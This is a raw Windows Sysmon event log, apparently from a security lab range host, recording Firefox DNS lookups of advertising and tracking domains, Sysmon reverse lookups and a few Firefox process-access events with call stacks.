14:00:54.419{59A5CD1D-945A-6005-3305-00000000A301}7052e3120.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:54.418{59A5CD1D-945A-6005-3305-00000000A301}7052eu2-ice.360yield.com052.58.206.142;52.59.77.252;18.156.133.101;18.194.102.50;18.195.103.23;35.156.171.204;52.58.161.11;52.58.204.249;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464143.144.173.69.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.107{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.097{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.096{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.095{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.084{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net035.244.159.8;34.98.64.218;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.084{59A5CD1D-945A-6005-3305-00000000A301}7052apester-d.openx.net0::ffff:34.98.64.218;::ffff:35.244.159.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.078{59A5CD1D-945A-6005-3305-00000000A301}7052ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.077{59A5CD1D-945A-6005-3305-00000000A301}7052ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud035.157.246.167;52.28.203.152;18.156.195.47;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.076{59A5CD1D-945A-6005-3305-00000000A301}7052c2shb.ssp.yahoo.com0type: 5 c2shb.one-mobile-prod.aws.oath.cloud;type: 5 ssp-ats-prod-eu-central-1.one-mobile-prod.aws.oath.cloud;::ffff:18.156.195.47;::ffff:35.157.246.167;::ffff:52.28.203.152;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.076{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.am5.vip.prod.criteo.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.074{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.am5.vip.prod.criteo.com0178.250.2.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.074{59A5CD1D-945A-6005-3305-00000000A301}7052bidder.criteo.com0type: 5 bidder.am5.vip.prod.criteo.com;::ffff:178.250.2.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.072{59A5CD1D-945A-6005-3305-00000000A301}7052ice.360yield.com0type: 5 eu2-ice.360yield.com;::ffff:52.59.77.252;::ffff:18.156.133.101;::ffff:18.194.102.50;::ffff:18.195.103.23;::ffff:35.156.171.204;::ffff:52.58.161.11;::ffff:52.58.204.249;::ffff:52.58.206.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.049{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api-fra02.omnitagjs.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.049{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid22000nf.pubmatic.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.048{59A5CD1D-945A-6005-3305-00000000A301}7052e8037.i.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.047{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid22000nf.pubmatic.com0185.64.189.112;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.047{59A5CD1D-945A-6005-3305-00000000A301}7052hbopenbid.pubmatic.com0type: 5 hbopenbid22000nfc.pubmatic.com;type: 5 hbopenbid22000nf.pubmatic.com;::ffff:185.64.189.112;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.046{59A5CD1D-945A-6005-3305-00000000A301}7052e8037.i.akamaiedge.net023.47.217.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.046{59A5CD1D-945A-6005-3305-00000000A301}7052itx4.smartadserver.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.045{59A5CD1D-945A-6005-3305-00000000A301}7052htlb.casalemedia.com0type: 5 htlb.casalemedia.com.edgekey.net;type: 5 e8037.i.akamaiedge.net;::ffff:23.47.217.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.045{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api-fra02.omnitagjs.com0185.255.84.150;185.255.84.151;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052itx4.smartadserver.com0185.86.139.96;185.86.139.58;185.86.139.59;185.86.139.95;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052tagged-by.rubiconproject.net.akadns.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052hb-api.omnitagjs.com0type: 5 hb-api-fra02.omnitagjs.com;::ffff:185.255.84.151;::ffff:185.255.84.150;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.044{59A5CD1D-945A-6005-3305-00000000A301}7052prg.smartadserver.com0type: 5 prga.smartadserver.com;type: 5 2-01-275d-0028.cdx.cedexis.net;type: 5 itx4.smartadserver.com;::ffff:185.86.139.95;::ffff:185.86.139.96;::ffff:185.86.139.58;::ffff:185.86.139.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.043{59A5CD1D-945A-6005-3305-00000000A301}7052tagged-by.rubiconproject.net.akadns.net069.173.144.140;69.173.144.141;69.173.144.143;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.042{59A5CD1D-945A-6005-3305-00000000A301}7052fastlane.rubiconproject.com0type: 5 tagged-by.rubiconproject.net.akadns.net;::ffff:69.173.144.143;::ffff:69.173.144.140;::ffff:69.173.144.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.845{59A5CD1D-945A-6005-3305-00000000A301}7052jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.840{59A5CD1D-945A-6005-3305-00000000A301}7052jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com0151.139.240.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.839{59A5CD1D-945A-6005-3305-00000000A301}7052jita.rtk.io0type: 5 jita-rtk-io-dmyt03fgsksh5xx.stackpathdns.com;::ffff:151.139.240.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464114.137.86.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.561{59A5CD1D-8E56-6005-2E00-00000000A301}24645.74.125.104.in-addr.arpa.0type: 12 a104-125-74-5.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464249.204.58.52.in-addr.arpa.0type: 12 ec2-52-58-204-249.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:55.556{59A5CD1D-8E56-6005-2E00-00000000A301}246459.152.212.52.in-addr.arpa.0type: 12 ec2-52-212-152-59.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 10341000x800000000000000018119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.204{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.127{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000018163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.564{59A5CD1D-8E56-6005-2E00-00000000A301}2464112.189.64.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.564{59A5CD1D-8E56-6005-2E00-00000000A301}246438.172.252.37.in-addr.arpa.0type: 12 690.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net;C:\Windows\sysmon64.exe 22542200x800000000000000018161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.559{59A5CD1D-8E56-6005-2E00-00000000A301}246434.217.47.23.in-addr.arpa.0type: 12 a23-47-217-34.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.558{59A5CD1D-8E56-6005-2E00-00000000A301}246447.195.156.18.in-addr.arpa.0type: 12 ec2-18-156-195-47.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.557{59A5CD1D-8E56-6005-2E00-00000000A301}2464252.77.59.52.in-addr.arpa.0type: 12 ec2-52-59-77-252.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.557{59A5CD1D-8E56-6005-2E00-00000000A301}246495.139.86.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464187.16.220.54.in-addr.arpa.0type: 12 ec2-54-220-16-187.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.556{59A5CD1D-8E56-6005-2E00-00000000A301}2464128.89.184.18.in-addr.arpa.0type: 12 ec2-18-184-89-128.eu-central-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.714{59A5CD1D-8E56-6005-2E00-00000000A301}246435.240.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464151.84.255.185.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:56.565{59A5CD1D-8E56-6005-2E00-00000000A301}2464131.2.250.178.in-addr.arpa.0type: 12 bidder.am5.vip.prod.criteo.com;C:\Windows\sysmon64.exe 22542200x800000000000000018167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:57.799{59A5CD1D-8E56-6005-2E00-00000000A301}246482.107.75.147.in-addr.arpa.0type: 12 lbadstorm-pk-nj-101;C:\Windows\sysmon64.exe 10341000x800000000000000018169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.861{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.861{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000018174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.759{59A5CD1D-945A-6005-3305-00000000A301}7052gum.par.vip.prod.criteo.com0178.250.0.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.758{59A5CD1D-945A-6005-3305-00000000A301}7052gum.criteo.com0type: 5 gum.par.vip.prod.criteo.com;::ffff:178.250.0.157;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.574{59A5CD1D-945A-6005-3305-00000000A301}7052static.am5.vip.prod.criteo.net02a02:2638:1::3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.573{59A5CD1D-945A-6005-3305-00000000A301}7052static.am5.vip.prod.criteo.net0178.250.2.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.572{59A5CD1D-945A-6005-3305-00000000A301}7052static.criteo.net0type: 5 static.am5.vip.prod.criteo.net;::ffff:178.250.2.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052e6603.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.250{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0::ffff:147.75.107.42;::ffff:147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.249{59A5CD1D-945A-6005-3305-00000000A301}7052e6603.g.akamaiedge.net0104.79.88.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.248{59A5CD1D-945A-6005-3305-00000000A301}7052ads.pubmatic.com0type: 5 pubmatic.edgekey.net;type: 5 e6603.g.akamaiedge.net;::ffff:104.79.88.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:02.633{59A5CD1D-8E56-6005-2E00-00000000A301}2464130.2.250.178.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:01.760{59A5CD1D-945A-6005-3305-00000000A301}7052gum.par.vip.prod.criteo.com02a02:2638::1c;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.945{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.934{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.933{59A5CD1D-945A-6005-3305-00000000A301}7052thor.rtk.io0::ffff:147.75.107.82;::ffff:147.75.107.42;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.649{59A5CD1D-8E56-6005-2E00-00000000A301}2464155.88.79.104.in-addr.arpa.0type: 12 a104-79-88-155.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.648{59A5CD1D-8E56-6005-2E00-00000000A301}2464157.0.250.178.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.583{59A5CD1D-945A-6005-3305-00000000A301}7052prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.582{59A5CD1D-945A-6005-3305-00000000A301}7052prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com034.250.108.103;52.19.224.33;52.31.77.198;52.49.95.65;54.72.153.48;54.194.17.133;54.195.118.210;34.246.141.173;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.581{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com.akadns.net02001:678:cb4:bbbb::11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.581{59A5CD1D-945A-6005-3305-00000000A301}7052beacon.krxd.net0type: 5 beacon-dub-prod.krxd.net;type: 5 prod-dub-beacon-1484770602.eu-west-1.elb.amazonaws.com;::ffff:34.246.141.173;::ffff:34.250.108.103;::ffff:52.19.224.33;::ffff:52.31.77.198;::ffff:52.49.95.65;::ffff:54.72.153.48;::ffff:54.194.17.133;::ffff:54.195.118.210;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.580{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com.akadns.net046.228.164.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.579{59A5CD1D-945A-6005-3305-00000000A301}7052ad.turn.com0type: 5 ad.turn.com.akadns.net;::ffff:46.228.164.11;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.578{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.576{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io052.49.193.31;52.214.70.9;54.72.203.0;54.171.14.147;54.228.192.197;52.31.242.159;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.575{59A5CD1D-945A-6005-3305-00000000A301}7052match.prod.bidr.io0::ffff:52.31.242.159;::ffff:52.49.193.31;::ffff:52.214.70.9;::ffff:54.72.203.0;::ffff:54.171.14.147;::ffff:54.228.192.197;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.388{59A5CD1D-945A-6005-3305-00000000A301}7052a1213.g.akamai.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.386{59A5CD1D-945A-6005-3305-00000000A301}7052a1213.g.akamai.net02.22.119.59;2.22.119.9;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.386{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.trustwave.com0type: 5 ocsp.trustwave.com.edgesuite.net;type: 5 a1213.g.akamai.net;::ffff:2.22.119.9;::ffff:2.22.119.59;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.287{59A5CD1D-945A-6005-3305-00000000A301}7052match-1943069928.eu-west-1.elb.amazonaws.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.283{59A5CD1D-945A-6005-3305-00000000A301}7052match-1943069928.eu-west-1.elb.amazonaws.com054.171.98.69;54.216.123.169;54.228.21.183;18.200.32.159;18.203.78.129;52.31.46.99;52.210.149.10;54.154.164.132;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 